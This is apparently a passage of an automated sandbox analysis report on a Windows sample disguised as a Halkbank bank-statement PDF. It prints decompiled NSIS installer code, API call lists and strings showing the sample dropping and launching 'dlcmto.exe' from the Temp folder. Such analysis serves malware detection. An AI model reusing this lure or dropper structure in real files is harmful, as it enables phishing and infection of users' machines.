                                          0x00404464
                                          0x00404464
                                          0x00404466
                                          0x00000000
                                          0x00000000
                                          0x0040446c
                                          0x00404470
                                          0x00404495
                                          0x0040449b
                                          0x004044a1
                                          0x004044a3
                                          0x00000000
                                          0x00000000
                                          0x004044c9
                                          0x004044cf
                                          0x004044d1
                                          0x004044d6
                                          0x00000000
                                          0x00000000
                                          0x004044dc
                                          0x004044df
                                          0x004044e2
                                          0x004044f9
                                          0x00404505
                                          0x0040451e
                                          0x00404524
                                          0x00404528
                                          0x0040452d
                                          0x00404533
                                          0x00000000
                                          0x00000000
                                          0x0040453d
                                          0x00404548
                                          0x00000000
                                          0x00404548
                                          0x00404472
                                          0x00404478
                                          0x00000000
                                          0x00000000
                                          0x0040447e
                                          0x00404484
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040448a
                                          0x0040445e
                                          0x00404555
                                          0x00404561
                                          0x00404568
                                          0x00000000
                                          0x004042b3
                                          0x004042b3
                                          0x004042b6
                                          0x004042e9
                                          0x004042e9
                                          0x004042eb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004042eb
                                          0x004042b8
                                          0x004042bc
                                          0x004042c1
                                          0x004042c3
                                          0x00000000
                                          0x00000000
                                          0x004042d3
                                          0x004042db
                                          0x00000000
                                          0x004042e1
                                          0x004040e9
                                          0x004040e9
                                          0x004040ed
                                          0x004040f2
                                          0x00404101
                                          0x00404101
                                          0x00404107
                                          0x0040410e
                                          0x00404152
                                          0x00404158
                                          0x00404171
                                          0x00404174
                                          0x00404187
                                          0x0040418d
                                          0x00000000
                                          0x00000000
                                          0x00404193
                                          0x0040419e
                                          0x004041a0
                                          0x004041a2
                                          0x004041c1
                                          0x004041c1
                                          0x004041c4
                                          0x004041c9
                                          0x004041cc
                                          0x004041dc
                                          0x004041dd
                                          0x004041df
                                          0x00404215
                                          0x00404225
                                          0x00000000
                                          0x00404225
                                          0x004041e1
                                          0x004041e7
                                          0x00404200
                                          0x00404205
                                          0x00404207
                                          0x00000000
                                          0x00000000
                                          0x00404209
                                          0x004041f5
                                          0x004041f5
                                          0x004041f7
                                          0x004041f7
                                          0x00000000
                                          0x004041f7
                                          0x004041ea
                                          0x004041ef
                                          0x00000000
                                          0x004041ef
                                          0x004041ce
                                          0x004041d4
                                          0x00000000
                                          0x00000000
                                          0x004041d6
                                          0x00000000
                                          0x004041d6
                                          0x004041c6
                                          0x00000000
                                          0x004041c6
                                          0x004041ac
                                          0x004041b3
                                          0x004041b9
                                          0x004041bb
                                          0x00404591
                                          0x00000000
                                          0x00404591
                                          0x00000000
                                          0x004041bb
                                          0x00404179
                                          0x00000000
                                          0x00404181
                                          0x00404160
                                          0x00404166
                                          0x0040456e
                                          0x0040456e
                                          0x00404574
                                          0x00404581
                                          0x00404587
                                          0x00404587
                                          0x00000000
                                          0x00404110
                                          0x00404115
                                          0x00404121
                                          0x0040412a
                                          0x0040422b
                                          0x00000000
                                          0x00404149
                                          0x0040414c
                                          0x00000000
                                          0x0040414c
                                          0x0040412a
                                          0x0040410e

                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                          • ShowWindow.USER32(?), ref: 00404121
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                          • ShowWindow.USER32(?,00000004), ref: 0040414C
                                          • DestroyWindow.USER32 ref: 00404160
                                          • SetWindowLongW.USER32 ref: 00404179
                                          • GetDlgItem.USER32 ref: 00404198
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                          • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                          • GetDlgItem.USER32 ref: 0040425E
                                          • GetDlgItem.USER32 ref: 00404268
                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                          • GetDlgItem.USER32 ref: 00404379
                                          • ShowWindow.USER32(00000000,?), ref: 0040439A
                                          • EnableWindow.USER32(?,?), ref: 004043AC
                                          • EnableWindow.USER32(?,?), ref: 004043C7
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                          • EnableMenuItem.USER32 ref: 004043E4
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                          • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                          • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                          • ShowWindow.USER32(?,0000000A), ref: 00404581
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: H7B
                                          • API String ID: 2475350683-2300413410
                                          • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                          • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                          • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                          • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                          C-Code - Quality: 96%
                                          			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                          0x00403d1d
                                          0x00403d26
                                          0x00403d2d
                                          0x00403d2f
                                          0x00403d43
                                          0x00403d55
                                          0x00403d5e
                                          0x00403d67
                                          0x00403d6e
                                          0x00403d73
                                          0x00403d7a
                                          0x00403d8d
                                          0x00403d8d
                                          0x00403d98
                                          0x00403d31
                                          0x00403d3c
                                          0x00403d3c
                                          0x00403d9d
                                          0x00403da7
                                          0x00403db0
                                          0x00403db5
                                          0x00403dc6
                                          0x00403e58
                                          0x00403e60
                                          0x00403e69
                                          0x00403e69
                                          0x00403e7f
                                          0x00403e85
                                          0x00403e93
                                          0x00403f14
                                          0x00403f1c
                                          0x00403f26
                                          0x00403f2b
                                          0x00403f31
                                          0x00403fbb
                                          0x00403fc0
                                          0x00403fc2
                                          0x00403fde
                                          0x00000000
                                          0x00403fde
                                          0x00403fc4
                                          0x00403fca
                                          0x00403fd2
                                          0x00403fd2
                                          0x00000000
                                          0x00403fca
                                          0x00403f3f
                                          0x00403f4a
                                          0x00403f4f
                                          0x00403f51
                                          0x00403f58
                                          0x00403f58
                                          0x00403f63
                                          0x00403f6b
                                          0x00403f6d
                                          0x00403f6f
                                          0x00403f78
                                          0x00403f7b
                                          0x00403f81
                                          0x00403f81
                                          0x00403fa0
                                          0x00403fb1
                                          0x00000000
                                          0x00403fb6
                                          0x00403f1e
                                          0x00403f20
                                          0x00000000
                                          0x00403e95
                                          0x00403e95
                                          0x00403ea1
                                          0x00403eab
                                          0x00403eb1
                                          0x00403eb6
                                          0x00403ec5
                                          0x00403fe3
                                          0x00403fe3
                                          0x00000000
                                          0x00403fe3
                                          0x00403ed4
                                          0x00403f0f
                                          0x00000000
                                          0x00403f0f
                                          0x00403dcc
                                          0x00403dcc
                                          0x00403dcf
                                          0x00403dd1
                                          0x00000000
                                          0x00000000
                                          0x00403ddf
                                          0x00403df1
                                          0x00403df6
                                          0x00403dff
                                          0x00000000
                                          0x00000000
                                          0x00403e05
                                          0x00403e07
                                          0x00403e14
                                          0x00403e14
                                          0x00403e1d
                                          0x00403e23
                                          0x00403e4b
                                          0x00403e53
                                          0x00000000
                                          0x00403e35
                                          0x00403e36
                                          0x00403e3f
                                          0x00403e45
                                          0x00403e46
                                          0x00000000
                                          0x00403e46
                                          0x00403e41
                                          0x00403e43
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403e43
                                          0x00403e23

                                          APIs
                                            • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                            • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                          • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                          • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,?,?,?,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74D0FAA0), ref: 00403E18
                                          • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,?,?,?,"C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                          • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf,?,00000000,?), ref: 00403E36
                                          • LoadImageW.USER32 ref: 00403E7F
                                            • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                          • RegisterClassW.USER32 ref: 00403EBC
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
                                          • CreateWindowExW.USER32 ref: 00403F09
                                          • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                          • GetClassInfoW.USER32 ref: 00403F6B
                                          • GetClassInfoW.USER32 ref: 00403F78
                                          • RegisterClassW.USER32 ref: 00403F81
                                          • DialogBoxParamW.USER32 ref: 00403FA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                          • API String ID: 1975747703-348211083
                                          • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                          • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                          • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                          • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                          C-Code - Quality: 98%
                                          			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\hardz\\Desktop", L"C:\\Users\\hardz\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\hardz\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                          0x004030db
                                          0x004030de
                                          0x004030e1
                                          0x004030fb
                                          0x00403100
                                          0x00403113
                                          0x00403118
                                          0x0040311e
                                          0x00000000
                                          0x00403120
                                          0x00403131
                                          0x00403142
                                          0x00403149
                                          0x00403151
                                          0x00403156
                                          0x00403158
                                          0x00403243
                                          0x00403245
                                          0x00403251
                                          0x00000000
                                          0x00000000
                                          0x0040325a
                                          0x00403286
                                          0x0040328b
                                          0x00403296
                                          0x00403298
                                          0x004032a9
                                          0x004032c4
                                          0x004032cd
                                          0x004032d2
                                          0x004032f1
                                          0x00403301
                                          0x00403313
                                          0x00403318
                                          0x00403320
                                          0x0040332d
                                          0x00403335
                                          0x0040333a
                                          0x0040333c
                                          0x0040333c
                                          0x00403344
                                          0x00403344
                                          0x00403347
                                          0x00403348
                                          0x00403348
                                          0x0040334b
                                          0x0040334d
                                          0x0040334d
                                          0x00403357
                                          0x00403363
                                          0x00000000
                                          0x00403368
                                          0x00000000
                                          0x00403320
                                          0x00000000
                                          0x004032d4
                                          0x00403262
                                          0x00403274
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040315e
                                          0x00403163
                                          0x00403168
                                          0x0040316c
                                          0x00403173
                                          0x0040317a
                                          0x0040317c
                                          0x0040317c
                                          0x00403187
                                          0x004032e0
                                          0x00403322
                                          0x00000000
                                          0x00403322
                                          0x00403194
                                          0x00403214
                                          0x00403218
                                          0x0040321d
                                          0x00000000
                                          0x00403214
                                          0x0040319d
                                          0x004031a2
                                          0x004031aa
                                          0x004031d0
                                          0x004031df
                                          0x004031e5
                                          0x004031ea
                                          0x004031f0
                                          0x00000000
                                          0x00000000
                                          0x004031fa
                                          0x00403202
                                          0x00403205
                                          0x0040320a
                                          0x0040320c
                                          0x0040320c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004031fa
                                          0x0040321e
                                          0x00403224
                                          0x00403230
                                          0x00403230
                                          0x00403233
                                          0x00403239
                                          0x00403239
                                          0x00403241
                                          0x00000000
                                          0x00403241

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004030E4
                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,00000400), ref: 00403100
                                            • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                            • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00403149
                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
